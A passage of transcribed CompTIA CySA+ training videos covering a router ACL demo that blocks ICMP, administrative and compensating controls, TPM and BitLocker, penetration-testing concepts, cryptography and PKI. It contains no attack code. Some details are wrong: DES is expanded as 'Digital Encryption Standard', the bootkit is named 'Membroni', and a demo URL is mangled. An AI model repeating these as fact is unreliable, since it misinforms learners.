card, and something you are such as a unique fingerprint. Multifactor authentication or MFA combines at least
two of these categories. Maybe it would include a smart card and a PIN – something you have and something
you know. Identity Federation is also a part of authentication that is becoming more and more popular these
days. Essentially, with Identity Federation, we have got a trusted central identity store. So, instead of having
multiple copies of user credentials, for example, we have got one central copy that is trusted by multiple
applications. So therefore, there has got to be some configuration, of course, so that various applications trust
the central identity store and also the central identity store has to trust the relying applications. Now the idea is
that Identity Federation is a single set of credentials that allows Web Single Sign-On for web applications.
Authorization occurs after successful authentication. We should be following the principle of least privilege so
that we only assign permissions that are absolutely required and nothing more. This is often done through
access control lists or ACLs at various levels. So we could have an ACL controlling access to various portions
of a web site or within an application. ACLs can control degrees of access to the file system on a server or
access to a network itself through network ACLs, which are often called network packet filtering rules.
Other examples of logical controls include antimalware, hardware tokens used for VPN authentication where
the hardware token is going to have a numeric code that changes periodically that is synchronized with the
VPN appliance. So we have to enter in that unique numeric code within a certain timeframe to successfully
authenticate to the VPN. Password policies are another example of logical controls as our NTFS file system
permissions.
In this video, you will learn how to configure router ACL rules to block ICMP traffic.
Objectives
[Topic title: Configure Router ACL Rules. The presenter is Dan Lachance. The Cisco Packet Tracer Student
window is open. Running along the top of the screen is the menu bar. The menu bar includes the File, Options,
and Help menus. The rest of the screen is divided into two sections. The first section includes The Logical,
New Cluster, and Viewport tabs. By default, the Logical tabbed page is open. The Logical tabbed page
includes a diagram. In the diagram, the PC-PT Client is connected to the 1841 Router1 via the 2950-24
Switch0. The 2950-24 Switch0 is further connected to the Server-PT Local DNS Server. The 1841 Router1 is
connected to the 2950-24 Switch1 via 1841 Internet and 1841 Example routers. The 1841 Internet is further
connected to the Server-PT Root DNS Server. The 2950-24 Switch1 is connected to the Server-PT
server.example.com and Server-PT authority.explains.com.] In this video, I'll demonstrate how to configure a
router ACL rule.
ACL stands for access control list. And, on a router, it essentially either permits or denies traffic into or out of
a specific router interface. So essentially, it's traffic filtering kind of like a packet filtering firewall. In our
diagram, we can see on the left that we have got a client PC that needs to go through a router here called
Router 1 in order to access our HTTP web server over here on the right, which has a DNS name of
server.example.com. So, in our diagram, the first thing we'll do is click on our client PC. [Dan clicks the PC-
PT client and the Client window opens. The Client window includes the Physical, Config, and Desktop tabs.
By default, the Physical tabbed page is open. The Physical tabbed page is divided into two sections. The first
section includes the MODULES and PT-CAMERA options. The second section includes the Zoom In, Original
Size, and Zoom Out tabs.]
Now this is a simulator. So, in the simulator here, I'm going to go to the Desktop tab and click on Command
Prompt. [The Desktop tab includes the Terminal, Command Prompt, Web Browser, and VPN icons. He clicks
the Command Prompt icon and the command prompt opens.] The first thing we're going to do is make sure
that we have got any type of connectivity at all. So I'm going to try to ping our web server by name. I'm going
to type ping server.example.com. So we can see that DNS resolved server.example.com to the IP address of
10.4.0.3. And of course, we have got a number of replies. So we know that ICMP network traffic is working
through Router 1 because we are getting these replies back. What we're going to do in our example is
configure an ACL rule on Router 1 that doesn't allow ICMP traffic, but we still want to be able to connect to
our web server. [He closes the Client window and the Cisco Packet Tracer Student window reappears.]
So, to begin this, if I were to take a look by simply hovering over Router 1 in my diagram, it will pop up and
give me a little bit of details about some of the network interfaces, which I can also click on the router to see as
well. [He clicks the 1841 Router1 and the Router1 window opens. The Router1 window contains the Physical,
Config, and CLI tabs. By default, the Config tabbed page is open. The Config tabbed page includes three
sections. The first section is the navigation pane. The navigation pane includes the GLOBAL, Settings, and
FastEthernet0/0 options. The second section is the content pane. He clicks the FastEthernet0/0 option and its
content is displayed in the content pane. The content pane includes the MAC Address, the Subnet Mask, and Tx
Ring Limit text boxes. The third section includes the Equivalent IOS Commands text box.] For example,
FastEthernet0/0 – we can see that interface here. This is the one that we're going to be using to control traffic
coming in from the PC on the left. Basically, we want to block ICMP traffic. [He closes the Router1 window
and the Cisco Packet Tracer Student window reappears.] So what we're going to do is click right on the router
in the simulator and click the CLI tab. [He clicks the 1841 Router1 and the Router1 window opens.] CLI
stands for command line interface. [The CLI tabbed page includes the IOS Command Line Interface, the Copy
button, and the Paste button.] So now what we're going to do is make sure that we configure an access list to
basically deny ICMP and allow all other IP traffic. To do that, I will type access-list 101. That's the number I'm
denying ICMP from anywhere to anywhere. [He types the following command in the IOS Command Line
Interface: access-list 101 deny icmp any any.] So I want to block all ICMP. At the same time, I'm going to use
the access list command again – access list 101. But this time I'm going to permit IP traffic – so from anywhere
to anywhere. [He types the following command in the IOS Command Line Interface: access-list 101 permit ip
any any.] So of course, ICMP and IP are completely differently protocols.
Next thing I want to do is go into the configuration of the appropriate network interface I want to apply those
rules to. So I'll type interface, now Fast Ethernet or FA0/0 is what I want to connect to. [He types the following
command in the IOS Command Line Interface: interface fa0/0.] So my prompt now implies with the if
command for interface that I'm now configuring that specific interface. Okay, that's great because now I want
to use the ip access-group command, specify the number of my access list – 101 – and tell up that I wanted to
bind to this network interface for inbound traffic, so in. [He types the following command in the IOS
Command Line Interface: ip access-group 101 in.] Now, at this point, it should be ready to go. And what that
means is that ICMP traffic should not be allowed, but all other IP traffic should be. Now, in the production
environment, first of all, you would probably be sitting at a station using PuTTY or some other remote tool to
SSH into your router. Secondly, don't turn off ICMP as we have done in this example unless you're absolutely
sure it isn't required by something in your network environment.
So let's go ahead and test this. I'm going to click the client PC in our simulator over on the left. [He clicks the
PC-PT Client and the Client window opens.] And I'm going to run a Command Prompt. So first thing I'll do is
try to ping server.example.com once again. However, notice this time that we get a destination host
unreachable where previously we were getting replies, that the only thing that's changed here is that our router
ACL doesn't allow ICMP. So that appears to be working. However, do we have any other type of connectivity
through Router 1? [He closes the command prompt.] So, to test that, I'm going to start a web browser on our
PC in our simulator. [He clicks the Web Browser icon and the Web Browser window opens. The Web Browser
window includes the URL text box, the Go button, and the Stop button along the top.] And we're going to see if
we can connect to server.example.com over HTTP because it is our web server. [In the URL, he types
http://server.example.com. Then he clicks the Go button.] And sure enough this sample page popped up where
we can see the blue test with the name of the server. [Below the URL text box, the name of the server is
displayed, which is server.example.com, which is also known as www.example.com.] So we know that we
have still got HTTP traffic, but we don't have ICMP connectivity through Router 1.
In this video, you will learn how to identify administrative security controls.
Objectives
[Topic title: Administrative Controls. The presenter is Dan Lachance.] In this video, we'll discuss
administrative controls.
Administrative security controls are defined by organizational policies and procedures, which could be
influenced by laws and regulations or business contracts. They include things like how to deal with personnel
in a secure manner – which would include things like secure background checks and so on – as well as the
adherence to business practices, ongoing monitoring and improvement.
Administrative controls have a number of categories such as preventative controls. These types of controls
minimize damage by preventing negative incidents or attempting to prevent them in the first place. It would
include things like mantraps controlling access to a physical facility where the outer door must close before an
inner door opens. And this will prevent people from tailgating or payback and coming in behind you without
knowing. Door locks are considered preventative administrative controls as is the separation of duties. Now
separation of duties ensures that we don't have one person that that can control on entire business process from
beginning to end. We have multiple people involved. However, if those people have colluded together to
commit fraud, for example, separation of duties can prevent that. Hiring and background checks are definitely
preventive administrative controls related to personnel as is disaster recovery planning and business continuity
planning to ensure that we can get systems and business processes back up and running as quickly and
efficiently as possible in the event of a negative incident.
Detective administrative controls are used to discover negative events that have occurred after they have
occurred. Things like intrusion detection systems or IDSs – which can detect anomalies and report on them,
but don't stop them – that's where intrusion prevention systems would come in. Rotation of duties within an
organization is considered a detective administrative control because when a new employee fills a position,
they might notice a discrepancy or an anomaly from the previous person that held that role. Same thing is true
with mandatory vacations. Security audits are sometimes required in order for organizations to comply with
what is required for certain types of businesses, but at the same time, security audits can also be used to
identify suspicious activity after it's already occurred. And we can learn from that to harden our environment.
Corrective administrative controls allow us to get things up and running – so for example, restoring a business
process to its original functional state, maybe, after a server that supports that process crashes. Data backups
are corrective administrative controls that we can use to restore data in the event of a problem. Intrusion
prevention systems can also not only detect and report on anomalies, but take steps to prevent them from
continuing. So therefore, they are considered corrective and not just detective administrative controls. The
execution of a disaster recovery plan is also considered a corrective administrative control-related action.
Learn how to identify security controls that compensate for other controls that are not fully effective.
Objectives
[Topic title: Compensating Controls. The presenter is Dan Lachance.] In this video, I'll talk about
compensating controls.
There are many different categories of controls that can be used to secure business processes or assets. With
compensating controls, these are used when more complex or expensive solutions just aren't practical. Now we
also might have an inability to comply with specific security requirements due to business or technical
restraints such as limits within our budgets or even a limit with our internal skillset. Compensating controls
need to address the original intent of the security requirement. And the great news is that we can even use
multiple compensating controls in place of one more complex or expensive solution.
Continuous monitoring ensures that our compensating controls are still effective in protecting business
processes or assets. In some cases, due to legal or regulatory compliance, we might have to use specific
compensating controls. Now, because we have got an ongoing changing business and technical environment,
that requires us to continuously monitor all of our security controls. We can do that using a variety of solutions
including a Security Information and Event Monitoring system or SIEM.
Some examples of compensating controls include a requirement where we have to prevent unwanted network
access. So our compensating control might be to disable unused switch ports. Another requirement might be
segregation of duties as related to a specific business process. Our compensating control might be to use video
surveillance within the facility. Another requirement might be to use multifactor authentication for each
application. However, a compensating control instead might be to use network access control to control
network access in the first place with multifactor authentication. When you look at specific requirements such
as with PCI DSS for organizations that deal with cardholder information for credit and debit cards, they'll list
some compensating controls that might be used in place of other more complex or expensive solutions.
[Topic title: Continuous Monitoring of Controls. The presenter is Dan Lachance.] The implementation of a
security solution does not mark the end of our responsibility as IT security technicians. In this video, we're
going to talk about continuous monitoring of controls.
Information Security Continuous Monitoring or ISCM is just this where we can continuously monitor the
effectiveness of security controls. It also allows for the timely response to threats that are ever-changing.
Threat prioritization is also possible for the proper allocation of project teams and resources. So, in the end,
we're evaluating the effectiveness of security controls by constantly monitoring their effectiveness and how
they are used. We might be required to do this for compliance with certain laws and regulations, which in turn
might actually influence the crafting of our organizational security policies. In some cases, it might also dictate
the use of compensating security controls in place of more expensive or more complex solutions.
With continuous monitoring, collected data gets periodically analyzed, which allows for risk management.
Risk management allows us to look at the acceptance of risk by engaging in certain business activities or risk
mitigation by using certain types of security controls, in some cases, even risk transfer – for instance – to a
public cloud provider or to an insurance company. Real-time monitoring is possible with systems including
Security Information and Event Management systems, otherwise called SIEM.
Information sources for continuous monitoring come from a multitude of places including log files, which
could be for network devices, servers, client devices, applications, and so on. We can also take a look at
vulnerability scan results as an information source for continuous monitoring of our controls because this will
point out any vulnerabilities that we need to address. So it'll also lend itself to threat prioritization. Audit
findings are a valuable gold mine of information. For instance, if we're being audited by a third party that
doesn't know anything about our system and has no interest specifically other than conducting an audit, then
we can use that to learn about weaknesses and then make changes to security controls.
People are also another information source – people that notice suspicious activity whether it's physical or on
the network. And of course, we can take a look at existing business processes to determine if we need to make
changes to further harden our environment.
[Topic title: Hardware Trust. The presenter is Dan Lachance.] In this video, we'll talk about hardware trust.
Firmware is essentially software embedded in a chip. And it's usually for a very specific use unlike an
operating system, which can do millions of things. So therefore, there is often much more trust placed in
hardware or firmware security solutions. One example of this is the Trusted Platform Module or TPM. This is
a firmware standard built in to modern laptops, desktops, and servers. It's part of a chip on the motherboard.
Now TPM can also be built in to the firmware and other devices like set-top boxes, smartphones, and even
tablets. It's part of the NIST-trusted computing requirements in Special Publications 800-147, 155, and 164,
which you could search up in your favorite web browser search engine.
TPM or Trusted Platform Module is firmware that can store cryptographic keys. Now this is used, for instance,
by softwares – such as Microsoft BitLocker – to store keys that are used for encryption and decryption of
entire disk volumes. However, specific solutions like Microsoft BitLocker can also allow keys to be stored on
USB thumb drives for non-TPM systems. TPM, when it gets initialized at the firmware level, creates what's
called a storage root key or SRK. Application-based keys are then protected by the storage root key. TPM
deals not only with the encryption and decryption of entire disk volumes, but it also can detect boot changes to
the boot environment.
So therefore, it's considered an effective mitigation against bootkit threats or master boot record or MBR
rootkits or even the 2011 Membroni attack. Membroni is another form of a bootkit attack. Essentially, it can
make changes to BIOS configurations and, in fact, the master boot record. Or you know, there are also some
bootkit threats that can actually flash or wipe the BIOS on a system making it unusable. Now with TPM, when
it gets configured and when it detects a boot-up change, the system will reboot and you will need to enter a
recovery key password to continue because it's considered suspicious activity.
Microsoft BitLocker is disk volume encryption. It doesn't encrypt specific files or folders like Microsoft EFS,
which stands for Encrypting File System. It's not tied to the user and it's designed really to protect data at rest.
So, when a system boots up and a BitLocker encrypted volume is decrypted, its business as usual and there is
no special protection. So it's designed for not only fixed disks, but also removable media where Microsoft
BitLocker To Go can be configured to encrypt data, for instance, on USB thumb drive. It can also be
configured to require a PIN at startup.
[The BitLocker Drive Encryption window opens. It includes the C:BitLocker off drive, the Data (D): BitLocker
off drive, the NEW VOLUME (E:) BitLocker off drive, and the USB (G:) BitLocker off drive.] Here, in the
Windows environment, I have started the BitLocker tool where I can see all of my disks such as C: where it
states that BitLocker is off. [The C: BitLocker off drive includes the Turn on BitLocker link.] Although, I do
have the option of turning on BitLocker for C: as well as my other fixed data drives. Because I have got a USB
thumb drive inserted, I have also got G: – in my case – listed down here where it says BitLocker is off where I
can configure BitLocker To Go. [Dan maximizes the USB (G:) BitLocker off drive. It includes the Turn on
BitLocker link.] And, if I were to click on that drive and then click on the Turn on BitLocker link, it goes
through a wizard that allows me to secure or encrypt the data on that USB thumb drive.
[The BitLocker Drive Encryption (G:) wizard includes the Use a password to unlock the drive checkbox, the
Use my smart card to unlock the drive checkbox, and the Next button.] For BitLocker To Go, I can flag
whether I want to Use a password to unlock the device either on this machine or others and/or the ability to use
a smart card to unlock the drive. [He selects the Use a password to unlock the drive checkbox and the Use my
smart card to unlock the drive checkbox. Then the Group Policy Management Editor window opens. Running
along the top is the menu bar. The menu bar includes the File, Action, and Help menus. The rest of the screen
is divided into two sections. The first section is the navigation pane. It includes the Default Domain Policy
[DC001.QUICK24*7.COM] Policy root node. The Default Domain Policy [DC001.QUICK24*7.COM]
Policy root node contains the Computer Configuration and User Configuration subnodes. By default, the
Domain Policy [DC001.QUICK24*7.COM] Policy root node is selected. The second section is the content
pane, and it contains the Extended and Standard tabs at the bottom. By default, the Extended tabbed page is
open. The Extended tabbed page includes the Computer Configuration and User Configuration subnodes.] To
configure the behavior of BitLocker on a larger scale, I might use Group Policy, which I have got open here.
So what I would do then – in the left-hand navigator under Computer Configuration – is open up Policies -
Administrative Templates - Windows Components. [He expands the Policies folder present under the
Computer Configuration subnode. The Policies folder includes the Software Settings and the Administrative
Templates: Policy definition subfolders. He further expands the Administrative Templates: Policy definition
subfolder. The Administrative Templates: Policy definition subfolder includes the Control Panel subfolder, the
Windows Components subfolder, and the System subfolders. He expands the Windows Components subfolder.
The Windows Components subfolder includes the Biometrics, the BitLocker Drive Encryption, and the Edge
UI subfolders. He selects the BitLocker Drive Encryption subfolder. ] Then I would choose BitLocker Drive
Encryption. [The BitLocker Drive Encryption subfolder includes the Fixed Data Drives and the Removable
Data Drives subfolders.] So here I have got options for Fixed Data Drives versus Removable Data Drives as
well as just some general BitLocker Drive Encryption options. [He selects the Bitlocker Drive Encryption
subfolder. The Content pane includes the Fixed Data Drives folder and the Prevent memory overwrite on
restart option. He then selects the Prevent memory overwrite on restart option. Then its information is
displayed in the content pane.]
In this video, learn how to identify factors related to conducting penetration tests.
Objectives
identify factors related to conducting penetration tests
[Topic title: Penetration Testing. The presenter is Dan Lachance.] In this video, we'll talk about penetration
testing.
Penetration testing is simply often referred to as a pen test. However, it's not the same as a vulnerability scan.
With the vulnerability scan, we scan a host or a network to identify weaknesses, but none of those weaknesses
get exploited. Well, with the pen test, we are exploiting the weaknesses to see what the reaction is from those
systems. So really, a pen test is testing to discover weaknesses and then exploiting those weaknesses. It can be
applied to a network. A pen test could be for a specific host or even just a specific application as part of the
application life cycle.
There needs to be rules of engagement prior to engaging in penetration testing because we have to think about
the impact or effect on production systems if the pen test is done on live production systems. We don't want a
pen tester bring down a mission critical component that is required for business without thinking about it first
and getting the proper permission. So we might consider then having a separate testing environment, which
may or may not be virtualized. We also have to think about the duration of the penetration test. Will it be
hours? Will it be days? Will it be weeks?
The key here is to think of these things ahead of time prior to the pen test. There might also need to be the
signature of nondisclosure agreements because a penetration test potentially could uncover very sensitive
information that the data owners thought was protected would not be unveiled through a pen test. There also
needs to be a testing schedule that is set ahead of time. Now, in some rare cases, a pen test schedule might not
be known by the network or data owners. And that's part of the point of the pen test as you never really know
when malicious users will strike. However, we might have a testing schedule that is known by all parties that
might take place after hours.
With penetration testing, we can have various teams. A red team, for instance, will be the team that would
attack an IT system, whereas a blue team would defend IT systems. The white team will be used to identify
weaknesses and then report them instead of exploiting them. Now this might be a hybrid of internal personnel
IT technicians and an external pen test team. Or it could be completely done externally. Or you might only use
a portion of these types of teams. The idea is that a pen test is a live attack-and-defense exercise where we
would involve multiple teams, should we choose to use them. We can also use tabletop or whiteboard exercises
to step through an attack and the mitigations against it to stop it.
With white-box testing, it is a pen test that gets run with full knowledge of the IT system being tested. Now
grey-box testing is a pen test that's being conducted with only partial knowledge of an IT system. Now that
could mirror, for example, a malicious user that's done some reconnaissance and learned a little bit and
inferred a little bit about how an IT system is configured. Black-box testing is a pen test where there is no
knowledge at all of an IT system. Now, for a hardened environment, reconnaissance might not reveal much of
anything useful to an attacker. So we can look at the various types of tests that we can be conducting against
our networks, hosts, or apps from various perspectives. There is also the aspect of social engineering, which
can also be a part of the pen test. It doesn't all have to be technical tools. Social engineering is tricking people
into somehow providing sensitive information they, otherwise, normally wouldn't provide. That might be in
the form of, during a pen test, part of the team calling up end users pretending to be a part of the helpdesk to
retrieve sensitive information.
Exercise Overview
[Topic title: Exercise: Mitigations and Security Control types. The presenter is Dan Lachance.] In this
exercise, you'll begin by identifying characteristics of host hardening followed by describing the purpose of a
honeypot, identifying standards bodies that provide IT security guidance, you will contrast physical, logical,
and administrative controls, and finally you will discuss the purpose of penetration testing. At this time, pause
the video and perform each of these exercises and come back to view the answers.
Solution
Host hardening includes many aspects such as firmware patches being applied either to expansion cards or to
the BIOS on the motherboard. Software patches, changing default configurations, the use of complex
passwords, and removing unneeded services also fall under host hardening.
A honeypot is a system that's intentionally left vulnerable. The purpose is so that we can track malicious
activity. However, care must be taken when using honeypots so that the honeypot doesn't get compromised by
malicious users and is then used to attack others. There is also the unintentional data leakage that we have to
consider.
Standards bodies that provide IT security guidance include the National Institute of Standards and Technology
or NIST, the International Organization for Standardization or ISO, and also the Open Web Application
Security Project or OWASP, which focuses specifically on web application security.
Physical security control types include things such as video surveillance and mantraps, whereas logical
security control types include examples such as network ACLs and multifactor authentication. Administrative
security control types include things such as background checks for employees as well as mandatory vacations
to point out anomalies.
Penetration testing is a type of test that's used to discover weaknesses. But, not only discover, also exploit
weaknesses. We can apply penetration testing to an entire network, to a specific host, or even down to a
specific application.
CompTIA Cybersecurity Analyst+: Protecting Network Resources
Authentication controls who gets access to resources. Stronger authentication means greater control over
resource access. Discover network protection techniques, including cryptography, biometrics, hashing, and
authentication.
Table of Contents
Objectives
[Topic title: Cryptography Primer. The presenter is Dan Lachance.] In this video, I'll talk about cryptography.
Cryptography protects digital data. It provides confidentiality, integrity, and authentication. Cryptanalysis, on
the other hand, is the close scrutiny of a cryptosystem to identify weaknesses within it. Encryption and
decryption of data is essentially data scrambling to prevent access to data from unauthorized users.
Authentication is used to verify the authenticity of origin of data. In other words, in the case of e-mail perhaps,
we have a digitally signed message that we can verify – really it did come from who it says it came from. So
the sender cannot refute the fact that it was sent. And this is called nonrepudiation. Now this is because the
sender would have possession of a private key. And only that private key is used to create a digital signature.
And no one else would have that private key. Hashing is used to verify data integrity. If a change is made to
data when we compute a hash, it will not match an original hash taken prior. So we know that something is
changed.
In cryptography, there are some terms that we have to get to know very well, one of which is plain text. This is
data that hasn't yet been encrypted. Ciphertext is encrypted plain text. So it's the result of feeding plain text to
an algorithm with a key. Encryption and decryption might require a single key, a symmetric key, or two keys
that are mathematically related – a public and private key pair – depending on the algorithm being used.
Ciphertext gets derived by taking plain text – seen here as Hello World! – combining it with a key, which we
see on the screen, [The key displayed on the screen is Q#$TAH$kskk3g2-.] and feeding that into an algorithm.
The result on the other end of the algorithm is our encrypted ciphertext. [The ciphertext is Gh%*_+!3BAL3.]
Cryptographic algorithms are also called ciphers. Essentially, they are mathematical formulas. Data and a key
are fed into the algorithm to result in the ciphertext. There are many IT solutions that allow the configuration
of specific ciphers that are to be used such as within a web browser or when configuring a VPN tunnel and so
on.
Stream ciphers encrypt message bits or bytes individually. And they're generally considered faster than their
counterpart block ciphers, which we'll talk about in a moment. However, stream ciphers don't provide
authenticity verification of a message. So examples of stream ciphers include RC4. This algorithm or stream
cipher is used with Wired Equivalent Privacy or WEP as well as Wi-Fi Protected Access – WPA.
However, it is considered vulnerable. So it shouldn't be used. Block ciphers encrypt blocks of data many bytes
together at once as opposed to bits or bytes individually like stream ciphers do. So, as a result, padding might
be required to ensure that blocks are always the same size. Examples of block ciphers include the Digital
Encryption Standard or DES, 3DES, Advanced Encryption Standard or AES, Blowfish, and Twofish.
With symmetric encryption and decryption, one key encrypts and decrypts. It is the same key. With
asymmetric encryption and decryption, we have mathematically related key pairs where the public key is used
to encrypt and the related private key can be used to decrypt a message. Keys have various attributes, such as
the length. And the smaller the length, the more susceptible the key would be to some kind of a brute force
attack.
Now a brute force attack attempts every possible key. If we look at DES, it has a 56-bit key length. And it has
been proven breakable. However, AES 256-bit on the other hand has not yet been proven breakable. Other
types of attacks include a known plain text attack where the attacker knows some or all of the original plain
text before it resulted in ciphertext. Now, once that gets cracked, the attacker could then decrypt other
messages once they learn of the key.
[Topic title: Symmetric Cryptography. The presenter is Dan Lachance.] In this video, we'll talk about
symmetric cryptography. Symmetric cryptography uses a single private key, and this is often called a secret
key or a shared secret. This secret key is used to both encrypt and decrypt. So there aren't two keys, there is
only one. But there is a lack of authentication. But a hashing algorithm can be used separately to verify data
integrity.
Generally, symmetric cryptographic algorithms are considered to execute faster than asymmetric algorithms,
which use different yet related keys. Symmetric cryptography is used in many ways including with Wi-Fi
preshared keys such as those used with WPA and WPA2 wireless security. But symmetric cryptography can
also be used with file encryption or other standards such as IPsec.
Consider the example of a Wi-Fi router with clients that need to connect to the wireless network. So the
administrator then needs to configure a preshared key on the Wi-Fi router. Connecting devices then must know
and configure that same preshared key in order to connect and be authenticated with the access point. Here, in
the configuration of a wireless router, [The ASUS Wireless Router RT-N66U web page is open. It includes
several sections such as General, Advanced Settings, and System Status.] we can see over on the right the
name of the wireless network or the SSID. [The name of the wireless network or the SSID is linksys. It is
displayed under the System Status section.] But we can also see the Authentication Method, which in this case
is set to WPA2-Personal.
Now, using WPA2-Personal or WPA-Personal, requires the configuration of a key. Now the key that we
configure must be known by connecting clients, so this is symmetric encryption. The difficulty with symmetric
cryptography is how to safely distribute keys on a large scale, such as over the Internet, how do we get the key
to everybody because all that a malicious user needs is the key. If they intercept a transmission, such as an e-
mail message that itself is not encrypted containing the key, then they can decrypt all messages.
The other difficulty is that the sender and receiver must have the same key to communicate. And possession of
the key means that decryption is possible for all messages. Examples of symmetric algorithms include RC4,
DES, 3DES, Blowfish, and AES. In this video, we discussed symmetric cryptography.
[Topic title: Asymmetric Cryptography. The presenter is Dan Lachance.] In this video, I'll go over asymmetric
cryptography. Asymmetric cryptography uses two mathematically related keys – public key and the private
key. The public key is used for encryption, and the mathematically related private key decrypts. Asymmetric
cryptography also provides authentication, so we can be assured that a transmission or a message comes from
who it says it came from.
Data integrity is a part of asymmetric cryptography also, so we can detect if changes have been made to data.
However, it's generally considered slower than symmetric algorithms. With asymmetric cryptography, the
problem of distributing keys securely even on a large scale disappears. And that is a big problem with
symmetric cryptography since the same key is used for everything. The public key can be shared with
everyone. Private keys, however, not quite the same, they need to be kept secret to the owner.
Keys can also be exported from a PKI or Public Key Infrastructure certificate that's issued. Now, if we're going
to export a private key, then it needs to be stored in a password-protected file. For instance, here in Internet
Explorer, I'm going to open up my Tools menu and I'm going to go all the way down to Internet options at the
bottom. [The Internet Options dialog box opens.] Then I'll go to the Content tab where I can click the
Certificates button. [The Certificates dialog box opens.]
I'm going to go to the Personal tab here where I'm going to select a personal certificate that was issued to
myself. Now that could be issued by a Certificate Authority, or a CA, or in some cases, such as with Windows,
the first time you encrypt a file using encrypting file system – EFS – you don't already have a user certificate,
one will be created for you.
However, the certificate comes to be when you select it here, you have the option of choosing Export down at
the bottom. [He clicks the Export button and the Certificate Export Wizard opens.] When you go through the
wizard, you have the option of exporting the private key. Now the public key is exported normally. And you
might export the public key from your certificate to give to another user so that they can encrypt, for example,
e-mail messages that they send to you because you will decrypt it with your private key.
Let's dive into the e-mail encryption example a bit further. Pictured here on the left, we have user Bob and on
the right we have user Alice. In this example, Bob wants to send an encrypted e-mail message to Alice. So
what happens is that Bob encrypts the message to Alice with Alice's public key. So one way or another, Bob
has to possess Alice's public key.
Now perhaps Alice exported it and provided it to Bob or perhaps Bob was able to read that from a centralized
address book, there are many ways to acquire public keys. And it's okay to share public keys with everybody.
That's why they are called public. So, again, Bob encrypts the message to Alice with her public key. Alice, on
the other hand, will decrypt the message with her related private key to which only she should have access.
These keys are stored in a PKI or X.509 certificate. And these certificates are issued by a Certificate Authority
or CA. Here the Certificate Authority could be within your company or it might be a third-party out on the
Internet. However, PKI certificates and by extension their keys eventually expire. Key pairs that are issued to
users or it could be issued to devices or applications are unique.
However, in some cases, they could be susceptible to a man-in-the-middle attack. Now, with the man-in-the-
middle attack, we've got an impersonation of an entity that's already communicating with another party. So
what could happen is that an impersonated public key could be provided to an unsuspecting sender.
So a public key, of course, is used to send encrypted data. And we could be fooling someone, if we are the
malicious user in this example, to send us sensitive information whether sender thinks it's going to someone
else and it's encrypted, therefore protected. Examples of asymmetric cryptographic algorithms include RSA,
Diffie-Hellman, and ECC.
Objectives
[Topic title: Public Key Infrastructure. The presenter is Dan Lachance.] In this video, I'll discuss Public Key
Infrastructure. Public Key Infrastructure is often called PKI. It's a hierarchy of digital security certificates that
are also sometimes called X.509 certificates. These certificates are issued by a Certificate Authority, otherwise
called a CA. And they get issued to a user or a device or an application. Certificates among other things
contain a unique public and private key pair that are used for things like encryption, decryption, and the
creation of verification of digital signatures.
With the Public Key Infrastructure at the top of the hierarchy, you've got the Certificate Authority, or CA.
Under which, you could optionally have subordinate Certificate Authorities. So, for instance, in a large
organization, we might have a CA for the company, but we might have a subordinate Certificate Authority for
different parts of the world.
Now, under the subordinate Certificate Authority, we actually have issued PKI certificates for users, devices,
or applications. However, take note that the Certificate Authority itself could directly issue user, device, and
application PKI certificates. Now something that we have to be careful of is the Certificate Authority being
untrusted.
If this is a trusted third-party Internet CA such as Symantec, then most softwares such as web browsers
automatically trust that signer. However, if you build your own Certificate Authority within your company and
you issue PKI certificates – for example – to secure an intranet web server, your devices will not trust the
signature on that web server certificate. So therefore, there is a bit of extra configuration when you use an
internal Certificate Authority.
The other thing to consider is that the top-level or root CA should be taken offline and kept offline for security
purposes. Now what that means is that if the Certificate Authority were to be compromised, all certificates
underneath it – which is everything in the hierarchy – would also be considered compromised.
So root-level or top-level CAs should be taken offline. Certificates themselves have an expiry date. This is set
by the issuing CA. And it can differ. It might be one year, might be five years, could be eight years. Either
way, upon expiration, the certificate can't be used any longer. So, before expiration, the certificate can be
renewed. So it doesn't have to be completely reissued.
A compromised PKI certificate can be revoked. So therefore, the certificate can no longer be used. Inside a
digital PKI certificate, we have many things including the digital signature of the signing Certificate Authority
that issued the certificate. There's also the subject identity where for a user it might be their e-mail address or
for a web site it might be the URL to that site.
There is also an expiration date within a PKI certificate as well as, of course, a unique public and private key
pair. Additionally, you'll have key usage information that defines how keys within the certificate are to be
used. There might also be the location of a certificate revocation list or CRL. This is usually in the form of a
URL. In other words, it's a site where we can pull down a list of serial numbers for revoked PKI certificates
that are not to be trusted.
Third-party certificates are often trusted on the Internet. However, self-certified certificates are not trusted.
And that's back to our example of having your own CA within your company. So devices and applications then
would have to be configured to trust that self-certified CA. Certificates can also be issued through something
called auto-enrollment. And this is often used in a closed or corporate enterprise type of environment.
For example, in a Microsoft Active Directory network, we can use Group Policy to configure auto-enrollment
once devices refresh Group Policy. This way we have a centralized and trusted way to issue certificates on a
larger enterprise scale. Here, in my web browser, if I – in this case – go to the Tools menu because it's Internet
Explorer and all the way down to Internet options, [The Internet Options dialog box opens.] then go to the
Content tab, I can then click the Certificates button. [The Certificates dialog box opens. It includes the
Intermediate Certification Authorities and Trusted Root Certification Authorities tabs.]
Now interestingly, I can see Intermediate Certification Authorities whose signatures are trusted by this web
browser. [Some of these authorities are GlobalSign Root CA, AddTrust External CA, and COMODO RSA
Certificate.] I can also go to trusted roots – in other words, the top of the hierarchy. Here I have an
alphabetical list of trusted certificate root authorities that can issue certificates. [Some of these authorities are
AddTrust External CA Root, azuregateway-838c8, Baltimore CyberTrust Root, and Certum CA.] So, for
example, if we trust the Baltimore CyberTrust Root listed here in Internet Explorer, then by extension we trust
every certificate issued under that hierarchy.
Now, if you connect – for example – to a web site that is secured over HTTPS with an SSL or a TLS
certificate, your browser will be consulted to verify whether or not it should trust the signature. And, if it
doesn't, it will pop-up with the message that tells the user that they probably should not proceed to that site
because the certificate is not considered to be valid. Notice here that we have Import and Export options. [He
points to the Import and Export buttons in the Certificates dialog box.] So, for instance, we could import a
trusted root certificate root key that we have created within our own environment. In this video, we discussed
Public Key Infrastructure.
Objectives
[Topic title: Request a PKI Certificate from a Windows CA. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to request a PKI certificate from a Windows Certificate Authority. A Certificate Authority, or
CA, is at the top of the PKI hierarchy, and its purpose is to issue PKI certificates. Or, if it doesn't do it directly,
then it will create subordinate CAs, which in turn can issue certificates. Either way, before you can configure a
certificate to be used for something like a web server as in our example, you have to know some details.
So, before we can request a PKI certificate to secure an HTTPS web server, we need to know the name of the
server. So here at the PowerShell command line, I'm going to ping the name of the server for which I want to
issue a PKI certificate. It's called srv2012-1, and the full name is srv2012-1.fakedomain.local.
So you need to know some of these details before you can request a PKI certificate. In the same way, if you're
